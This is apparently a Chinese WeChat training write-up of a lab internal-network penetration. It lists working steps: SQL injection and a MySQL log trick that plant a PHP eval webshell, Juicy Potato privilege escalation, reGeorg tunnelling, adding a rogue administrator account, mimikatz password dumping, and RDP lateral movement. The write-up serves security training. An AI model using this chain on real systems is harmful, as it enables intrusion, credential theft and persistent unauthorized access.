学网安渗透
扫码加我吧
免费&进群
来Track安全社区投稿~
千元稿费!还有保底奖励~
预备知识
什么是内网渗透?
在我们拿下目标服务器后,对其局域网进行攻击,比如提权、权限维持、数据提取
如何绕过1290安全性报错?
mysql日志法(root权限)
1.show variables like ‘%general%’; #查看配置
2.set global general_log = on; #开启general log模式
3.set global general_log_file = ‘/var/www/html/1.php’; #设置日志目录为shell地址
4.select ‘<?php eval($_REQUEST[8]);?>’ #写入shell
烂土豆的功能
能够自动拿取系统的最高权限,并且对windows全版本通杀,如果系统版本不兼容就可以指定系统 烂土豆.exe -p “whoami” -c{}
Regeorg功能
考虑一种场景,有两个主机A和B。其中主机A上运行了Web服务,且端口映射到公网,可以被网布人员访问,主机B是在网访问不到的。攻击者通过楼哦东在主机A上传了webshell,但同时又处于某些限制不能得到A的主机权限,这个时候也无法通过常规方法直接登录到主机B获取权限。
这个时候reGeorg在这个时候又了很大的作用,攻击者已经有了主机A的webshell权限,而主机A能够同主机B通信,那么在主机A上安装reGeorg工具,使得攻击者发出的请求能够通过A转达到B,而B的响应能够转达到攻击者。
连接语法:
py -2 reGeorgSocksProxy.py -u 文件地址 -l 127.0.0.1 -p 端口
猕猴桃的作用
猕猴桃提权,并将密码通过纯明文的形式显示出来
碰撞的语法
privilege::debug 提神权限
log
sekurlsa::logopasswords 抓取密码
proxifier的作用
能够添加代理服务器,设置代理规则,只对某个进程进行代理,可以防止网络被影响。
靶场实战
一、判断是否存在sql注入
输入:id=1 and 1=2
结果:
二、判断字段数
输入:id=1 order by 3
结果:字段数为2
三、判断显错位
输入:id=1 and 1=2 union select 1,2
结果:显错位在第二位
四、写入一句话木马
输入:id=1 and 1=2 union select 1,’<?php eval($_REQUEST[8])?>’ into outfile ‘C:phpStudyWWW1.php’(文件路径从网页报错获取)
结果:写入木马文件1.php
五、菜刀连接并查看自己的权限
输入:whoami
结果:为test
六、查看系统信息
输入:systeminfo
结果:获取了系统版本为Windows Server 2008 R2,并且是在虚拟机上运行的,且ip为10.0.1.4,并且有两个补丁
七、使用烂土豆提权
前提:将烂土豆文件拖入到菜刀中,并改名为123.exe
输入:123.exe -p “whoami”
结果:提权成功
八、查看3389端口是否开启
输入:netstat -ano
结果:开启
九、将文件tunnel.nosocket.php拖入菜刀,并修改为It.php
十、运行reGeorgSocksProxy.py 连接本机和目标主机
前提:安装了 urllib3(python -m pip install urllib3)
输入:py -2 reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/It.php -l 127.0.0.1 -p 10010
结果:开启本地端口10010,进行连接
(我使用的是pycharm中的终端)
十一、使用proxifier代理
(记得将default的动作改为direct,只添加mstsc.exe,其它的都删除)
十二、创建新的管理用户以便有凭据进行远程连接
输入:123.exe -p “net user yy yy123321!/add”(这里对密码有要求,复杂一点点就好了)
输入:123.exe -p “net localgroup administrators yy/add”
结果:我的账号yy 密码 yy123321! 成功变为目标主机的管理员
十三、将猕猴桃拖入菜刀
十四、远程连接目标主机
十五、使用猕猴桃碰撞密码
前提:使用管理员身份进行碰撞
输入:
1、privilege::debug
2、log
3、sekurlsa::logonpasswords
结果:获取密码为 woshifengge1.(别忘记有个点了)
十六、查看主机网段信息
十七、我们不断尝试远程连接10.0.1.0的所有内网ip
凭据:用户:Administrator 密码:woshifengge1.
结果:在10.0.1.8连接成功(这边建议不要想我一样,可以尝试s扫描器)获取flag
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
分享本文到朋友圈,可以凭截图找老师领取
上千教程+工具+交流群+靶场账号哦
分享后扫码加我!
回顾往期内容
代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!
点赞+在看支持一下吧~感谢看官老爷~
你的点赞是我更新的动力
原文始发于微信公众号(掌控安全EDU):内网渗透(一)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论